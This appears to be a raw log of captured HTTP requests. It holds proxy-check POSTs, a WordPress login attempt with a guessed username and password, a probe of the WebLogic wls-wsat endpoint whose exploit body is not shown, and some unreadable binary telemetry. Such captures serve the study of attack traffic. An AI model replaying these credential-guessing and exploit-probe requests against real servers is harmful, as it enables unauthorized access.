BQi0xXwWBUGT77zzl7LXfYu0hFx18CGDGsU6vGrk9HkFAZ9e2Aa0j7iB6c+RnODsuh5q7UaiDS8blMr2DYnqEv/dBbVu52tVhPyg8XqgShGUteW7KbXtibEeUdeW4lJ17y0lpLV4tJVqbRwV3DyhPxk2FxeQfqCvp2LLwDNQ8RLuhPzh4KBxvKcUrKfqBV4JBa+ZMWIFqiG/DffTYrDfP7x0l3iKL3MJXh5xiU9AZROuhrqN+FulvH2pcvxcxsokL55kMndBW6Q6M07OA9+hGRJ35G9k6at6BhuopdoTakVOp6xh84lI9hKCQeOOzPTUlrUzwF1ZsUkQjal49REteqnl81k2mPvAcG0j6uWtiKXi3lRwF3gkvjlhJm233pN0Nd9Dsw== | |
POST http://123.249.24.233/POST_ip_port.php HTTP/1.1 | |
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */* | |
Accept-Language: zh-cn | |
Content-Type: application/x-www-form-urlencoded | |
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | |
Host: x.x.x.x | |
Content-Length: 41 | |
Pragma: no-cache | |
&verifycode=&ip_port=162.252.243.126:8080 | |
POST /wp-login.php HTTP/1.1 | |
Referer: http://x.x.x.x/wp-login.php | |
Accept: */* | |
Accept-Language: zh-cn | |
Content-Type: application/x-www-form-urlencoded | |
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | |
Host: x.x.x.x | |
Content-Length: 18 | |
Cache-Control: no-cache | |
log=172&pwd=172zxc | |
POST http://infoc2.duba.net/c/ HTTP/1.1 | |
Content-Length: 129 | |
Host: infoc2.duba.net | |
Connection: Keep-Alive | |
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) | |
Å l»9≤ Ã≈*ÄH!O“§ ∞î ˛ º¶º¶º ·Ê•¡Ã ∏ –·ÈÁ· ≈¡®ºƒ‹Õ ΩÎÏπºÓ∏± ∏s ≈¡®ºƒ‹Õ –·ÈÁ· | |
∞î Å Y ›∆√«∆fl | |
POST http://check.proxyradar.com/azenv.php?auth=149607147675&a=PSCMN&i=1082769120&p=80 HTTP/1.1 | |
Cookie: testCookie=true | |
Host: check.proxyradar.com | |
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) | |
Referer: https://proxyradar.com/ | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 13 | |
Connection: close | |
testPost=true | |
POST /wls-wsat/CoordinatorPortType HTTP/1.1 | |
Host: x.x.x.x:80 | |
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0 | |
Connection: Close | |
Content-Type: text/xml | |
Content-Length: 1187 | |
POST http://infoc2.duba.net/c/ HTTP/1.1 | |
Content-Length: 129 | |
Host: infoc2.duba.net | |
Connection: Keep-Alive | |
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) | |
Å l÷yy Ã≈*ÄH!O“§ ∞î ˛ º¶º¶º ·Ê•¡Ã ∏ –·ÈÁ· ≈¡®ºƒ‹Õ ΩÎÏπºÓ∏± ∏s ≈¡®ºƒ‹Õ –·ÈÁ· | |
∞î ìD!Y ›∆√«∆fl | |
POST http://behacdn.ksmobile.net/cfcl HTTP/1.1 | |
Accept-Encoding: gzip | |
Charset: UTF-8 | |
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc | |
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI) | |
Host: behacdn.ksmobile.net | |
Connection: Keep-Alive | |
Content-Length: 38 | |
& |